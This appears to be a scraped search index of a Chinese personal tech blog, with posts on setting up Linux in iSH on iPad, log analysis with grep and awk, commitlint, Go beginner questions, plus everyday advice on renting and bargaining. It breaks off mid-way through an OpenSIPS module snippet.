下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。\nstep7: vim写个hello world吧 vim index.html\nstep8: 监听端口可以吗? 写web服务器就不赘述了,直接用python自带的静态文件服务器吧。\npython3 -m http.server 这会打开一个静态文件服务器,监听在8000端口。\n我们打开自带的safari浏览器看看,能否访问这个页面。\nhello world出现。完美!!!\nstep9: 后台运行 后台运行的思路是:\n使用tmux 创建一个新的session 在这个session中执行下面的命令。下面的命令实际上是获取你的位置信息,当App切到后台时,位置在后台刷新,保证ish能够后台运行。当然这需要给予位置权限。你也可以手动输入 cat /dev/location 看看会发生什么。 cat /dev/location \u0026gt; /dev/null \u0026amp; FAQ 有些人会问,ish不支持多标签页,怎么同时做很多事情呢? 
问这个问题,说明你还没用过tmux这个工具,建议你先学学tmux。 ","permalink":"https://wdd.js.org/posts/2020/11/kfl9zd/","summary":"我在家里的时候,大部分时间用iPad远程连接到服务端做开发。虽然也是蛮方便的,但是每年都需要买个云服务器,也是一笔花费,最近看到一个App, 可以在手机上直接运行一个Linux环境,试了一下,果然还不错。下面记录一下安装过程。\nstep1: 下载iSh step2: 安装apk 这个软件下载之后打开,就直接进到shell界面,虽然它是一个基于alpine的环境,但是没有apk, 我们需要手工安装这个包管理工具。\nwget -qO- http://dl-cdn.alpinelinux.org/alpine/v3.12/main/x86/apk-tools-static-2.10.5-r1.apk | tar -xz sbin/apk.static \u0026amp;\u0026amp; ./sbin/apk.static add apk-tools \u0026amp;\u0026amp; rm sbin/apk.static \u0026amp;\u0026amp; rmdir sbin 2\u0026gt; /dev/null 温馨提示:在iSh的右下角,有个按钮是粘贴按钮。\nstep3: apk update 虽然安装了apk, 但是不更新的话,可能很多安装包都没有,所以最好先更新。\n在更新之前。最好执行下面的命令,把apk的源换成清华的,这样之后的安装软件会比较快点。\nsed -i \u0026#39;s/dl-cdn.alpinelinux.org/mirrors.tuna.tsinghua.edu.cn/g\u0026#39; /etc/apk/repositories apk update step4: 安装各种开发工具 git zsh tmux vim\u0026hellip; apk add git zsh tmux vim step5: 安装oh-my-zsh 这是必不可少的神器 因为从github上克隆oh-my-zsh可能会很慢,所以我用了码云上的一个仓库。 这样速度就会很快了。\ngit clone https://gitee.com/nuannuande/oh-my-zsh.git ~/.oh-my-zsh cp ~/.oh-my-zsh/templates/zshrc.zsh-template ~/.zshrc chsh -s $(which zsh) step6: 安装nodejs python golang等。 apk add nodejs python3 下面看到输出了nodejs和python的版本,说明安装成功。另外ish支持换肤的。之前的白色的,下面的是黑色的。","title":"在iPhone iPad上搭建Linux本地开发环境"},{"content":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","permalink":"https://wdd.js.org/posts/2020/10/sxuez4/","summary":"环境mac\n# 这个目录打包之后,内部的顶层目录是dist, 解压之后,有可能覆盖到以前的dist tar -zcvf demo.tar.gz dist/ # 使用这个命令,顶层目录将会被修改成demo-0210 tar -s /^dist/demo-0210/ -zcvf demo.tar.gz dist/ ","title":"tar打包小技巧: 替换根目录"},{"content":"只要有价格,就可以讲价 **只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。**有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一次喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才能留够上涨的空间 **50%理论 
,**一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策,提高价格,这里最重要的是摸出卖家的底价,高于这个底价,卖家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","permalink":"https://wdd.js.org/posts/2020/10/ahtqix/","summary":"只要有价格,就可以讲价 **只要有价格,就可以讲价。**但是也有例外,例如超市,超市的东西明码标价。售货员一般不会管价格。\n其次,要和能管价的人谈 **其次,要和能管价的人谈。**有些人不管价格,讲多少都没用。\n50%理论 第一次喊价以后,一般只会抬价,而不会降价,所以务必要重视。\n例如一束花,店家要价80,实际这束花成本20。如果你第一次喊价70,那你只能优惠小于10元。\n第一次喊价要低于心理价位,这样才能留够上涨的空间 **50%理论**,一般你的第一次出价可以按照卖家要价的50%开始喊价。然后再利用各种计策,提高价格,这里最重要的是摸出卖家的底价,高于这个底价,卖家才会卖。80元的花,你的第一次出价可以喊40元。 脸皮要厚,脸皮厚,才能要更多优惠 ","title":"讲价的学问"},{"content":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 file2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以指定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.log 12:14 WARNING:db:1 bad message 12:14 WARNING:db:21 bad message 12:14 WARNING:db:2 bad message1 12:14 WARNING:db:4 bad message 仅输出匹配字段 grep -o args 使用-o参数,可以仅仅输出匹配项,而不是整个匹配的行 ➜ go-tour grep -o -E \u0026#34;db:\\d+ \u0026#34; a.log db:1 db:21 db:2 db:4 统计关键词出现的行数 例如一个nginx的access.log, 我们想统计其中的POST的个数,和OPTIONS的个数。\n先写一个脚本,名为method.ack\nBEGIN{ post_lines = 0 options_lines = 0 printf \u0026#34;start\\n\u0026#34; } /POST/ { post_lines++ } /OPTIONS/ { options_lines++ } END { printf \u0026#34;post_lines: %s, \\noptions_lines: %s \\n\u0026#34;,post_lines,options_lines } 然后执行\nawk -f method.ack access.log 时间处理 比如给你一个nginx的access.log, 让你按照每秒,每分钟统计下请求量的大小,如何做呢?\n首先取出日志行中的时间,然后从时间中取出秒 awk '{print $4}' 10.32.104.47 - - [29/Sep/2020:06:43:53 +0800] \u0026#34;OPTIONS url HTTP/1.1\u0026#34; 200 0 \u0026#34;\u0026#34; \u0026#34;Mozi 
Safari/537.36\u0026#34; \u0026#34;-\u0026#34; awk \u0026#39;{print $4}\u0026#39; access.log [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 [29/Sep/2020:05:15:27 那如何取出分钟呢?使用awk的字符串函数, substr(str, startIndex, len) awk \u0026#39;{print substr($4,0,18)}\u0026#39; access.log [29/Sep/2020:05:23 [29/Sep/2020:05:23 对输出结果进行 uniq -c 统计出现重复行的次数。即单位时间内时间重复的次数,也就是单位时间内的请求数。\n625 [29/Sep/2020:06:36 625 [29/Sep/2020:06:37 624 [29/Sep/2020:06:38 624 [29/Sep/2020:06:39 651 [29/Sep/2020:06:40 626 [29/Sep/2020:06:41 624 [29/Sep/2020:06:42 560 [29/Sep/2020:06:43 排序与去重 sort 按照某一列去重 按照多列去重 vim专项练习 :set nowrap 取消自动换行 :set nu 显示行号 :%!awk '{$2=\u0026quot;\u0026quot;;print $0}' 删除指定的列 :%!awk '{print $3,$4}' 挑选指定的列 :g/key/d 删除匹配的行 :v/key/d 删除不匹配的行 :g/key/p 仅仅显示匹配的行 :v/key/p 仅仅显示不匹配的行 /key1\\|key2 查找多个关键词 :nohl 移除高亮 核武器 lnav 过滤 统计图 select cs_method , count( cs_method ) FROM access_log group by cs_method ","permalink":"https://wdd.js.org/posts/2020/04/qlqhiv/","summary":"预处理 从一个文件中过滤 grep key file ➜ grep ERROR a.log 12:12 ERROR:core bad message 从多个文件中过滤 grep key file1 file2 多文件搜索,指定多个文件 grep key *.log 使用正则的方式,匹配多个文件 grep -h key *.log 可以使用-h, 让结果中不出现文件名。默认文件名会出现在匹配行的前面。 ➜ grep ERROR a.log b.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message ➜ grep ERROR *.log a.log:12:12 ERROR:core bad message b.log:13:12 ERROR:core bad message 多个关键词过滤 grep -e key1 -e key2 file 使用-e参数,可以指定多个关键词 ➜ grep -e ERROR -e INFO a.log 12:12 ERROR:core bad message 12:12 INFO:parse bad message1 正则过滤 grep -E REG file 下面例子是匹配db:后跟数字部分 ➜ grep -E \u0026#34;db:\\d+ \u0026#34; a.","title":"[todo]锋利的linux日志分析命令"},{"content":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有他们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is running and Flash policy file is correctly placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 
如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 flash_player_admin_guide.pdf\n","permalink":"https://wdd.js.org/posts/2020/09/thg9yu/","summary":"虽然flash已经几乎被淘汰了,但是在某些老版本的IE里面,依然有他们顽强的身影。\n使用flash 模拟websocket, 有时会遇到下面的问题。虽然flash安全策略文件已经部署,但是客户端依然报错。\n[WebSocket] cannot connect to Web Socket Server at \u0026hellip; make sure the server is running and Flash policy file is correctly placed.\n解决方案:\n在**%WINDIR%\\System32\\Macromed\\Flash**下创建一个名为mms.cfg的文件, 如果文件已经存在,则不用创建。\n文件内容如下:\nDisableSockets=0 flash_player_admin_guide.pdf","title":"flash_player_admin_guide"},{"content":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续集成工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.18.3) ⧗ input: 00 ✖ subject may not be empty [subject-empty] ✖ type may not be empty [type-empty] ✖ found 2 problems, 0 warnings ⓘ Get help: https://github.com/conventional-changelog/commitlint/#what-is-commitlint 根据commitlog生成changelog 下面命令中的1.5.5 1.5.10可以是两个tag, 也可以是两个分支。\ngit log 可以提取两个点之间的commitlog, 使用\u0026hellip;\ngit log --pretty=format:\u0026#34;[%h] %s (%an)\u0026#34; 1.5.5...1.5.10 | sort -k2,2 \u0026gt; changelog.md 参考 https://github.com/conventional-changelog/commitlint/tree/master/@commitlint/config-angular 
https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html ","permalink":"https://wdd.js.org/posts/2020/09/vu0ag0/","summary":"建议先看下前提知识:https://www.ruanyifeng.com/blog/2016/01/commit_message_change_log.html\n提交信息规范 通用类型的头字段\nbuild 构建 ci 持续集成工具 chore 构建过程或辅助工具的变动 docs 文档(documentation) feat 新功能(feature) fix 修补bug perf 性能优化 refactor 重构(即不是新增功能,也不是修改bug的代码变动) revert style 格式(不影响代码运行的变动) test 增加测试 git commit -m \u0026#34;fix: xxxxxx\u0026#34; git commit -m \u0026#34;feat: xxxxxx\u0026#34; 安装 安装依赖 yarn add -D @commitlint/config-conventional @commitlint/cli husky 修改package.json 在package.json中加入\n\u0026#34;husky\u0026#34;: { \u0026#34;hooks\u0026#34;: { \u0026#34;commit-msg\u0026#34;: \u0026#34;commitlint -E HUSKY_GIT_PARAMS\u0026#34; } } 新增配置 文件名:commitlint.config.js\nmodule.exports = {extends: [\u0026#39;@commitlint/config-conventional\u0026#39;]} 测试 如果你的提交不符合规范,提交将会失败。\n➜ git commit -am \u0026#34;00\u0026#34; warning ../package.json: No license field husky \u0026gt; commit-msg (node v12.","title":"使用commitlint检查git提交信息是否合规"},{"content":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的链接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.com drwxr-xr-x 3 wangdd staff 96B Sep 14 09:17 golang.org 路径在GOPATH/pkg/mod 目录下\n4. cannot find module providing package github.com 在项目根目录执行\ngo mod init module_name 5. 
选择什么Web框架 fiber 如果你要写一个web服务器,最快速的方式是挑选一个熟悉的框架。 如果你熟悉Node.js中的express框架,那你会非常快速的上手fiber,因为fiber就是参考express做的。\nhttps://github.com/gofiber/fiber\n6. 自动构建 air npm中有个包,叫做nodemon,它会在代码变更之后,重启服务器。\n如果你需要在golang中类似的功能,可以使用https://github.com/cosmtrek/air\n7. 如何查看官方库文档 go doc fmt | less ","permalink":"https://wdd.js.org/golang/golang-start-faq/","summary":"1. 如何安装go 本次安装环境是win10子系统 ubuntu 20.04\n打开网站 https://golang.google.cn/dl/\n选择合适的最新版的链接\ncd mkdir download cd download wget https://golang.google.cn/dl/go1.16.3.linux-amd64.tar.gz tar -C /usr/local -xvf go1.16.3.linux-amd64.tar.gz 因为我用的是zsh 所以我在~/.zshrc中,将go的bin目录加入到PATH中 export PATH=$PATH:/usr/local/go/bin 保存.zshrc之后 source ~/.zshrc ➜ download go version go version go1.16.3 linux/amd64 2. go proxy设置 Go 1.13 及以上(推荐)\n打开你的终端并执行\ngo env -w GO111MODULE=on go env -w GOPROXY=https://goproxy.cn,direct 3. go get 下载的文件在哪? 检查 go env\nGOPATH=\u0026#34;/Users/wangdd/go” /Users/wangdd/go/pkg/mod total 0 drwxr-xr-x 4 wangdd staff 128B Sep 14 09:17 cache drwxr-xr-x 8 wangdd staff 256B Sep 14 09:17 github.","title":"Golang初学者的问题"},{"content":"在上海工作的人,除了一年一次的春运,就可能就是一年一次的找房搬家了。\n找房彷佛就是一趟西天取经,要经历九九八十一难,也要和各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 
上面这些设备,不要仅仅打眼看看外表正不正常,更要尽可能去试试。比如说马桶,即使不能坐在上面上个厕所,你也要用手按一下,看看冲水是否正常。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来说,如果转租不出去,你又确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有黑纸白纸写清楚的,你都可以认为是中介和二房东在忽悠。\n","permalink":"https://wdd.js.org/posts/2020/09/xglwgs/","summary":"在上海工作的人,除了一年一次的春运,就可能就是一年一次的找房搬家了。\n找房彷佛就是一趟西天取经,要经历九九八十一难,也要和各种妖魔鬼怪斗智斗勇。这其中难处,暂且不表。重点介绍你应当如何去按照一定的方案来检查各种设施的功能。\n要知道,世事多变,你现下找的房子如果很不错,即使后期突然需要转租,也是比较容易转租的。否则房子转租不出去,自己也白白赔了押金。\n重点检查\n洗衣机 空调 冰箱 抽油烟机 马桶 上面这些设备,不要仅仅打眼看看外表正不正常,更要尽可能去试试。 交钱之前你是二房东大爷,交完钱签好合同,二房东就是你大爷了。马桶要是不好用,浪费水不说,还影响心情。到时候你找你大爷来修,你大爷就不一定有时间了。你大爷一般包了几百套房子,怎么会管你的小问题呢。\n总之呢,你要有自己的一个检查清单项目,要检查哪些,如何检查,务必做到切实可行。\n有的时候,房子有些问题,房东和中介故意顾左右而言他,你切不可被他们玩的团团转。一定要按照既定的方案实施检查。\n另外就是签合同了,违约金这块要注意的。有的中介和二房东狼狈为奸,除了要不退押金,还要有额外的赔钱项。这点务必要注意。正常来说,如果转租不出去,你又确定要退房,一般只有不退押金,没有其他的赔钱项。这点要在租房合同上写清楚。\n凡是没有黑纸白纸写清楚的,你都可以认为是中介和二房东在忽悠。","title":"租房的检查清单"},{"content":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员薅羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说道:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果有表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说道:不好意思,这个可能记得别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算机,抬头望着天空的那朵白云。彷佛在做云计算,然后说:一共38块。\nshit! 
很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被薅羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","permalink":"https://wdd.js.org/posts/2020/09/hpc6fy/","summary":"大部分人结账付钱的时候,都不怎么关注。很多次被收银员薅羊毛了也毫不察觉。\n场景1:\n你去买水果,看到苹果比较新鲜,价格8元/每斤,但是收银员称重计费的时候,是按照12元/每斤计算的。但是当时你在打开支付宝准备付钱,没有注意称上的单价。付费过后,收银员没给你小票。你也没注意,事情就这么过去了。 如果你对收银员按的单价表示怀疑,问了句:这苹果怎么和标价上不一致? 收银员尴尬的笑了笑,说道:不好意思,我按错了。比较老练的可能会说:不好意思,我还以为你拿的是旁边的那种水果呢?\n场景2:\n你和朋友一起去吃烤鱼,点了一条清江鱼,服务员称重过后,在菜单上用铅笔写了3.5斤。酒足饭饱之后,你去结账。收银员开出小票,上面写的清江鱼 4.2斤,你也没注意。甚至有可能那个铅笔写的斤数已经被酒水的污渍涂抹的不清楚了。如果有表示怀疑,仔细看了看小票,说鱼的重量不对。收银员又尴尬的笑了笑,说道:不好意思,这个可能记得别的桌的鱼的重量的。\n场景3:\n你买了一包垃圾袋7元,一包衣服撑18,一个垃圾桶6,五金店的老板也没用计算机,抬头望着天空的那朵白云。彷佛在做云计算,然后说:一共38块。\nshit! 很多人真的就直接掏钱了。\n你看看,收银员说的不好意思多值钱,简直是一字千金啊!但是更多时候,我们都是稀里糊涂的蒙在鼓里。\n要想不被薅羊毛,务必要谨记。\n商品的标价要谨记于心 不要相信收银员的信口开河的算钱,要自己算 买完东西,一定要问收银员要小票 收银员称重的时候,要注意观察称上显示的价格和摆货区的价格是否一致 ","title":"如何避免被收银员坑"},{"content":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标识 ","permalink":"https://wdd.js.org/posts/2020/09/upi47f/","summary":"System Calls 应用程序工作在用户模式 应用程序不能直接访问硬件资源,应用程序需要调用操作系统提供的接口间接访问。这个叫做系统调用。一般的系统调用都是阻塞的。阻塞的意思就是你在网上买了个苹果,在你收到这个快递之前,你啥也不干,就躺在床上等着。 非阻塞 非阻塞的程序,在系统调用时,会立即返回一个标识 ","title":"IO性能 Node vs PHP vs Java vs Go"},{"content":"为什么要用iPad开发? 
第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转站其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Termius连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外表比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的,有些人不知道哪里好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tmux 后记 ","permalink":"https://wdd.js.org/posts/2020/09/rzumhc/","summary":"为什么要用iPad开发? 第一,我不想再买台电脑或者笔记本放在家里。因为我也不用电脑来打游戏。而且无论台式机还是笔记本都比较占地方。搬家也费劲。 第二,我只有一台MacBook Pro,以前下班也会背着,因为总有些事情需要做。但是自从有一天觉得肩膀不舒服了,我就决定不再背电脑。廉颇老矣,腰酸背痛。 虽然不再背电脑,但是偶有雅兴,心血来潮,我还需要写点博客或者代码的。 所以我买了台iPad来开发或者写博客。 前期准备工作 硬件准备 一台iPad 一个蓝牙键盘。最好买那种适合笔记本的蓝牙键盘,千万不要买可折叠的蓝牙键盘,因为用着不舒服 软件准备 常规的功能,例如写文字,写博客,一个浏览器足以胜任。唯一的难点在于如何编程。\n目前来说,有两个方案:\n方案1: 使用在线编辑器。例如码云,github, codepen等网站,都是提供在线编辑器的。优点是方便,免费。缺点也很明显,无法调试或者运行代码。 方案2: 购买云主机,iPad上安装Termius, ssh远程连接到服务端,在真正的操作系统中做开发。优点是比较自由,扩展性强。缺点是需要花钱,而且在没有IDE环境做开发是有不小的难度的。 方案1由于比较简单,就不赘述了。\n着重讲讲方案2:\n购买云主机 一般来说,即使是最低配置的主机,一年的费用也至少要几百块。但是也有例外情况。我的目标是找那些年费在一百块以内的云主机。\n针对大学生的优惠。一般大学生可以以几十块的价钱买到最低配的云主机。 针对新用户的优惠。新用户的优惠力度还是很大的。一般用过一年之后,我就会转站其他云服务提供商。所以国内的好多朵公有云,基本上我都上过。唯一没上过的就是筋斗云。 特殊优惠日。一般来说,一年之内,至少存在两个优惠日,双十一和六一八。在这两个时间点,一般可以买到比较优惠的云主机。 开发环境搭建 使用Termius连接到远程服务器上。注意最好在公有云上使用公钥登录,并禁止掉密码登录。最好再安装个fail2ban。因为每个云主机基本上每天都有很多恶意的登录尝试。 需要安装oh-my-zsh. 最好用的sh, 不解释。 作为开发环境,一个屏幕肯定是不够的,所以你需要tmux. 编辑器呢。锻炼自己的VIM使用能力吧。VIM是个外表比较冰冷的编辑器,上手难度相比于那些花花绿绿的编辑器而言,显得那么格格不入。但是就像有首歌唱的,有些人不知道哪里好,但就是谁也替代不了。 总之呢,你必须要强迫自己能够熟练的运用以下的几个软件:\nVIM tmux 后记 
","title":"使用iPad开发折腾记"},{"content":"早上六点多起床,搭乘半个小时的地铁,来到医院做体检。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。\n","permalink":"https://wdd.js.org/posts/2020/08/cs9htr/","summary":"早上六点多起床,搭乘半个小时的地铁,来到医院做体检。\n在抽血排队叫号的时候,我看到一位老奶奶被她女儿搀扶着坐在抽血的窗口前。\n老奶奶把右边的胳膊伸到抽血的垫子上,那是让人看一眼就难以忘记的皮肤。她的皮肤非常松弛,布满了褶皱,褶皱上有各种棕色和深色的斑点。\n我回想起了高中时学的生物学,皮肤是人类最大的一个器官,并且是保护人体的第一道防线。\n我不禁看了看自己胳膊,思绪万千。或许以后我的皮肤也是这样吧。这就是岁月的皮肤!\n时间啊!你走的慢点吧!\n人生很短,做些值得回忆的事情吧。","title":"岁月的皮肤"},{"content":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。\n","permalink":"https://wdd.js.org/posts/2020/08/ybgr0g/","summary":"我挺喜欢看动漫的,尤其是日漫(似乎也没有别的选择🐶)。\n小时候星空卫视放七龙珠,大学追火影和海贼王。日漫中梦想和激战总是少不了,这也是少年所必不可少的。但是日漫有个很大的特点,就是烂尾。\n没办法,漫画一旦达到了一定的连载时期,很多时候往往不受原作者控制了。这其中可能涉及到不少人的利益纠葛。\n与动辄几百集的日漫相比,美漫似乎更加偏向于短小精悍。\n近年来我也看过一些不错的美漫。例如瑞克和莫提,脆莓公园。这类漫画有个特点,就是更加现实,当然其中也不乏有温情出现。看这类漫画,让我想到李宗吾先生所说的厚黑学。感觉美国人是无师自通,深谙厚黑之哲学。\n也许动漫没有变,变的是我们自己:从梦想和激战转变到现实和厚黑。","title":"从日漫到美漫"},{"content":"module_exports 这个结构在每个模块中都有,这个有点类似js的export或者说是node.js的module.export。\n这是一个接口的规范。\n重点讲解几个关键点:\nlocal_zone_code是模块名字,这个是必需的 cmds表示在opensips脚本里可以有哪些暴露的函数 params规定了模块的参数 mod_init在模块初始化的时候会被调用, 只会被调用一次 关于module_exports这个结构的定义,可以查阅:sr_module.h文件\nstruct module_exports exports= { \u0026#34;local_zone_code\u0026#34;, MOD_TYPE_DEFAULT,/* class of this module */ MODULE_VERSION, DEFAULT_DLFLAGS, /* dlopen flags */ 0, /* load function 